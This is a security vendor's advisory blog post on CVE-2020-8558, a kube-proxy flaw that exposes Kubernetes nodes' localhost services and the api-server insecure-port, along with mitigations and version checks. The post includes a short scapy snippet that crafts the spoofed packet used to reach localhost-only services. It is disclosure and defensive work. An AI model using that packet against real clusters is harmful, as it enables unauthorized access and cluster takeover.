Executive Summary
A security issue assigned CVE-2020-8558 was recently discovered in the kube-proxy, a networking component running on Kubernetes nodes. The issue exposed internal services of Kubernetes nodes, often run without authentication. On certain Kubernetes deployments, this could have exposed the api-server, allowing an unauthenticated attacker to gain complete control over the cluster. An attacker with this sort of access could steal information, deploy crypto miners or remove existing services altogether.
The vulnerability exposed nodes’ localhost services – services meant to be accessible only from the node itself – to hosts on the local network and to pods running on the node. Localhost bound services expect that only trusted, local processes can interact with them, and thus often serve requests without authentication. If your nodes run localhost services without enforcing authentication, you are affected.
The issue details were made public on April 18, 2020, and a patch was released on June 1, 2020. We worked to assess the additional impact on Kubernetes clusters and found that some Kubernetes installations don’t disable the api-server insecure-port, which is normally only accessible from within the master node. Exploiting CVE-2020-8558, attackers can gain access to the insecure-port and take full control over the cluster.
We alerted the Kubernetes security team of the potential impact of this vulnerability. In turn, the team rated the vulnerability’s impact as High in clusters where the api-server insecure-port is enabled, and otherwise Medium. Luckily, CVE-2020-8558’s impact is somewhat reduced on most hosted Kubernetes services like Azure Kubernetes Service (AKS), Amazon’s Elastic Kubernetes Service (EKS) and Google Kubernetes Engine (GKE). CVE-2020-8558 was patched in Kubernetes versions v1.18.4, v1.17.7, and v1.16.11 (released June 17, 2020). All users are encouraged to update.
Prisma Cloud customers are protected from this vulnerability through the capabilities described in the Conclusion section.
The kube-proxy
kube-proxy is a network proxy running on each node in a Kubernetes cluster. Its job is to manage connectivity among pods and services. Kubernetes services expose a single clusterIP, but may consist of multiple backing pods to enable load balancing. A service may consist of three pods – each with its own IP address – but will expose only one clusterIP, for example, 10.0.0.1. Pods accessing that service will send packets to its clusterIP, 10.0.0.1, but must somehow be redirected to one of the pods behind the service abstraction.
That’s where the kube-proxy comes in. It sets up routing tables on each node, so that requests targeting a service will be correctly routed to one of the pods backing that service. It’s commonly deployed as a static pod or as part of a DaemonSet.
GKE’s documentation has further details, if you're interested.
There are networking solutions, such as Cilium, that could be configured to fully replace the kube-proxy.
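To make the service abstraction concrete, here’s a minimal sketch that prints a service’s clusterIP alongside the backing pod IPs kube-proxy routes to. It assumes kubectl is already configured against your cluster; "my-service" is a hypothetical service name.

```python
# A minimal sketch: print a service's clusterIP and the pod IPs behind it.
# Assumes kubectl is configured; "my-service" is a hypothetical service name.
import json
import subprocess

def kubectl_json(*args):
    out = subprocess.run(["kubectl", *args, "-o", "json"],
                         capture_output=True, text=True, check=True).stdout
    return json.loads(out)

svc = kubectl_json("get", "service", "my-service")
eps = kubectl_json("get", "endpoints", "my-service")

print("clusterIP:", svc["spec"]["clusterIP"])
for subset in eps.get("subsets", []):
    for addr in subset.get("addresses", []):
        print("backing pod IP:", addr["ip"])
```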
The Culprit Is route_localnet
As part of its job, the kube-proxy configures several network parameters through sysctl files. One of those is net.ipv4.conf.all.route_localnet – the culprit behind this vulnerability. Sysctl documentation states, "route_localnet: Do not consider loopback addresses as martian source or destination while routing. This enables the use of 127/8 for local routing purposes. default FALSE."
Let’s unpack that explanation. For IPv4, the loopback addresses consist of the 127.0.0.0/8 address block (127.0.0.0-127.255.255.255), though commonly only 127.0.0.1 is used, with the hostname “localhost” mapped to it. These are addresses a machine uses to refer to itself. Packets targeting a local service are sent to IP 127.0.0.1 through the loopback network interface, with their source IP set to 127.0.0.1 as well.
Setting route_localnet instructs the kernel not to treat 127.0.0.0/8 addresses as martian. What does “martian” mean in this context? Well, some packets arrive at a network interface and make claims about their source or destination IP that just don’t make sense. For example, a packet could arrive with a source IP of 255.255.255.255. That packet shouldn’t exist: 255.255.255.255 can’t identify a host, it’s a reserved address used to indicate broadcast. So what’s going on? Your kernel can’t know for sure and has no choice but to conclude the packet came from Mars and should be dropped.
Martian packets often hint that someone malicious on the network is trying to attack you. In the example above, the attacker may want your service to respond to IP 255.255.255.255, broadcasting the response. A fishy destination IP can also cause a packet to be deemed martian, such as a packet arriving at an external network interface with a destination IP of 127.0.0.1. Again, that packet doesn’t make sense – 127.0.0.1 is used for internal communication through the loopback interface and shouldn’t arrive from a network-facing interface. For more details on martian packets, refer to RFC 1812.
In some complicated routing scenarios, you might want the kernel to let certain martian packets pass through. That’s what route_localnet is used for. It instructs the kernel not to consider 127.0.0.0/8 as martian addresses (as it normally would, like in the case discussed in the previous paragraph). The kube-proxy enables route_localnet to support a bunch of routing magic that I won’t get into, but route_localnet is disabled by default for a reason. Unless proper mitigation is set up alongside it, attackers on the local network could exploit route_localnet to perform several attacks. The most impactful is reaching localhost bound services.
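If you want to verify this on one of your nodes, the sysctl is exposed under /proc. A small sketch, meant to be run on the node itself:

```python
# Read the route_localnet sysctl directly from /proc on a node.
# On a node running kube-proxy you should see the value 1 (enabled).
from pathlib import Path

value = Path("/proc/sys/net/ipv4/conf/all/route_localnet").read_text().strip()
print("net.ipv4.conf.all.route_localnet =", value)
```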
Localhost-only Services
Linux allows a process to bind to a specific IP address, such as the address of a single network interface, so that it only receives traffic sent to that address. Internal services often use this feature to listen only on 127.0.0.1. Normally, this ensures that only local processes can access the service, as only they can reach 127.0.0.1. That assumption breaks with route_localnet, since it allows external packets destined for 127.0.0.0/8 to be delivered. That’s highly concerning given that internal services tend not to enforce authentication, expecting that external packets will never reach them.
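As a concrete illustration, here is a minimal sketch of such a localhost-only service. The port is arbitrary, and there is deliberately no authentication, mirroring the assumption described above.

```python
import socket

# A minimal localhost-only TCP service: binding to 127.0.0.1 means the
# kernel will normally only deliver connections that originate on this host.
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("127.0.0.1", 1234))   # port 1234 is an arbitrary example
srv.listen()

while True:
    conn, addr = srv.accept()
    # No authentication here: the service trusts that only local processes
    # can ever reach it, which is exactly the assumption route_localnet breaks.
    conn.sendall(b"hello, local caller\n")
    conn.close()
```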
Reaching Internal Services
An attacker attempting to reach the victim’s internal services would need to construct a malicious packet where the destination IP address is set to 127.0.0.1 and the destination MAC address is set to the victim's MAC address. Without a meaningful destination IP, the attacker’s packet only relies on layer 2 (MAC-based) routing to reach the victim and is thus limited to the local network. Therefore, even if a victim enabled route_localnet, only attackers on the local network could access the victim’s localhost services.
When the victim machine receives the malicious packet, it will let it pass because of route_localnet. Since the packet has a destination IP of 127.0.0.1, it is eligible to access localhost services. Table 1 shows what a malicious packet may look like. The attacker’s IP is 10.0.0.1 with MAC address XXX, and the target’s IP is 10.0.0.2 with MAC address YYY. The target is running a localhost-only service on port 1234.
| src mac | XXX | dst mac | YYY |
|---------|-----|---------|-----|
| src ip | 10.0.0.1 | dst ip | 127.0.0.1 |
| src port | random | dst port | 1234 |

Table 1. A packet exploiting route_localnet
The attacker sets the packet’s source IP to their own address to ensure they receive the target’s responses. To summarize, route_localnet allows attackers on the local network to access a host’s internal services with packets like the one shown above.
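For illustration only, here’s a rough scapy sketch of the packet from Table 1. The addresses are the hypothetical ones from the example, the interface name is an assumption, and this should only be run against systems you are authorized to test.

```python
# A sketch of the packet from Table 1, built with scapy (pip install scapy).
from scapy.all import Ether, IP, TCP, sendp

ATTACKER_IP = "10.0.0.1"           # attacker's real IP, so replies come back
VICTIM_MAC  = "YY:YY:YY:YY:YY:YY"  # victim node's MAC (layer-2 delivery only)

pkt = (
    Ether(dst=VICTIM_MAC) /
    IP(src=ATTACKER_IP, dst="127.0.0.1") /   # the "martian" destination
    TCP(dport=1234, sport=40000, flags="S")  # SYN to the localhost-only service
)

# sendp() transmits at layer 2; the bogus destination IP is never used for
# routing, only the destination MAC decides where the frame goes on the LAN.
sendp(pkt, iface="eth0")
```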
Back to the Kubernetes Vulnerability (CVE-2020-8558)
Because of kube-proxy, every node in the cluster has route_localnet enabled. As a result, every host on a node’s local network could gain access to the node’s internal services. If your nodes run internal services without authentication, you are affected.
Aside from neighboring hosts on a node's local network, pods running on the node could also access its internal services. To be clear, a pod can only reach the internal services of the node hosting it. To carry out the attack, the pod must possess the CAP_NET_RAW capability. Unfortunately, Kubernetes grants this capability by default.
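To check whether a pod you run actually has this capability, one rough approach is to inspect the effective capability bitmap the kernel reports in /proc; CAP_NET_RAW is capability number 13.

```python
# Run inside a pod: check whether CAP_NET_RAW (capability 13) is in the
# effective capability set reported by the kernel.
CAP_NET_RAW = 13

with open("/proc/self/status") as f:
    for line in f:
        if line.startswith("CapEff:"):
            cap_eff = int(line.split()[1], 16)
            print("CAP_NET_RAW present:", bool(cap_eff & (1 << CAP_NET_RAW)))
            break
```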
When we examined this issue, we tried to identify localhost services that are natively deployed by Kubernetes. We found that by default, the Kubernetes api-server serves unauthenticated requests on localhost through a port dubbed the insecure-port. The insecure-port exists to allow other control-plane components running on the master (such as the scheduler and controller manager) to easily talk with the api-server. Neither role-based access control (RBAC) nor any other authorization mechanism is enforced on that port. Kubernetes installations frequently run the api-server as a pod on the master node, meaning it runs alongside a kube-proxy that has enabled route_localnet.
Alarmingly, this means that if your Kubernetes deployment didn’t disable the insecure-port, hosts on the master node’s local network could exploit CVE-2020-8558 to command the api-server and gain complete control over the cluster.
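If you administer the master node, a quick way to see whether the insecure-port is serving is to probe it locally. The sketch below assumes the historical default port 8080; adjust it if your distribution configures a different value.

```python
# Run on the master node: probe the api-server insecure port locally.
# 8080 is the historical default for --insecure-port (an assumption here).
import urllib.request

try:
    with urllib.request.urlopen("http://127.0.0.1:8080/version", timeout=3) as resp:
        print("insecure port is serving:", resp.read().decode())
except OSError as err:
    print("insecure port appears disabled or filtered:", err)
```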
Managed Kubernetes
Managed Kubernetes platforms such as GKE, EKS and AKS are better protected against CVE-2020-8558.
To begin with, the virtual networks of some cloud service providers (CSPs), such as Microsoft Azure, don’t support layer-2 semantics and MAC-based routing. You can easily see how this manifests – every AKS machine has the same MAC address: 12:34:56:78:9A:BC. This mitigates exploitation of CVE-2020-8558 from other hosts on a node’s local network, but malicious pods possessing CAP_NET_RAW should still be able to carry out the attack.
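You can see the shared MAC for yourself from a node or pod by reading it from sysfs (eth0 is an assumption here; substitute your primary interface).

```python
# Print the MAC address of eth0; on AKS nodes you would expect to see the
# shared 12:34:56:78:9a:bc address mentioned above.
from pathlib import Path

print(Path("/sys/class/net/eth0/address").read_text().strip())
```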
Cloud-hosted Kubernetes offerings also tend to manage the Kubernetes control plane and api-server for you and run them on a separate network from the rest of the cluster. This protects the api-server, as it isn’t exposed to the rest of the cluster. Even if a CSP were to run the api-server without disabling the insecure-port, attackers in the cluster wouldn’t be able to access it, as they aren’t on the same local network.
Still, if your CSP virtual network does support layer-2 routing, malicious hosts in your cluster’s network could access localhost services on the worker nodes.
The Fix
The initial fix actually resides in the kubelet and adds mitigations around route_localnet: iptables rules that cause nodes to drop external packets destined for 127.0.0.1. At the time of writing this post, route_localnet is still enabled by the kube-proxy. There are ongoing discussions about disabling it.
Even with those mitigations applied, there’s still a special case where a local network attacker could send packets to nodes’ internal UDP services. However, the attack only works if the victim node disables reverse path filtering (which normally isn’t the case), and even then the attacker won’t be able to see the responses. A patch is being developed, but it may be dropped since the attack depends on an insecure setting (rp_filter=0).
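One rough, hedged way to check whether a node already has the mitigation in place is to look for an iptables rule that drops traffic destined for 127.0.0.0/8. The exact chain and rule text vary across Kubernetes versions, so treat this as a heuristic rather than an authoritative test.

```python
# Heuristic check: scan iptables-save output for a DROP rule aimed at
# traffic destined for 127.0.0.0/8 (the shape of the CVE-2020-8558 mitigation).
import subprocess

rules = subprocess.run(["iptables-save"], capture_output=True, text=True).stdout
suspects = [r for r in rules.splitlines()
            if "127.0.0.0/8" in r and "-j DROP" in r]

if suspects:
    print("possible mitigation rules found:")
    for rule in suspects:
        print(" ", rule)
else:
    print("no obvious mitigation rule found")
```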
Am I Affected?
If all of the below are true, your cluster is vulnerable to CVE-2020-8558:
- Your cluster is running a vulnerable version (earlier than v1.18.4, v1.17.7 or v1.16.11); a quick version check sketch appears at the end of this section.
- Note that while the issue originated from the kube-proxy, the patch is in the kubelet.
- Your nodes have the kube-proxy running on them.
- Your nodes (or hostnetwork pods) run localhost-only services which don’t require any further authentication.
Additionally, if the following is also true, your cluster may be vulnerable to a complete takeover through the api-server insecure-port:
- Your cluster doesn’t disable the api-server insecure-port (via --insecure-port=0).
- The api-server runs on a node alongside a kube-proxy, for example, in deployments where the api-server is a pod itself.
A node could be attacked either by a malicious host on the local network or by a malicious pod with CAP_NET_RAW running on the node.
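As a starting point for the first item on the checklist above, here’s a hedged sketch that compares your cluster’s server version against the patched releases. It assumes kubectl is configured and that the server version string follows the usual vMAJOR.MINOR.PATCH form; managed platforms often append suffixes (for example "-gke.1"), which the sketch strips off.

```python
# Rough version check against the patched releases (v1.16.11 / v1.17.7 / v1.18.4).
import json
import subprocess

PATCHED = {16: 11, 17: 7, 18: 4}  # minor release -> first patched patch level

ver = json.loads(subprocess.run(
    ["kubectl", "version", "-o", "json"],
    capture_output=True, text=True, check=True).stdout)["serverVersion"]

major = int(ver["major"])
minor = int(ver["minor"].rstrip("+"))
patch = int(ver["gitVersion"].split(".")[2].split("-")[0])

if major == 1 and minor in PATCHED:
    print("patched" if patch >= PATCHED[minor] else "vulnerable version")
elif major == 1 and minor < 16:
    print("vulnerable version (release line predates the fix)")
else:
    print("release line newer than the fix; patched")
```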
Conclusion
CVE-2020-8558 can have some serious consequences. You should patch your clusters as soon as possible. CVE-2020-8558 also serves as a reminder that security best practices do work and significantly reduce attack surface. You should disable the api-server insecure-port, and if your pods don’t require CAP_NET_RAW, there’s no reason they should have that capability. While not related to this specific issue, we also recommend other hardening measures, such as enabling RBAC and running containers as a non-root user.
Palo Alto Networks Prisma Cloud customers are protected from this vulnerability. Compliance rules ensure your clusters are configured securely, blocking or alerting on:
- The api-server insecure port
- Pods running with CAP_NET_RAW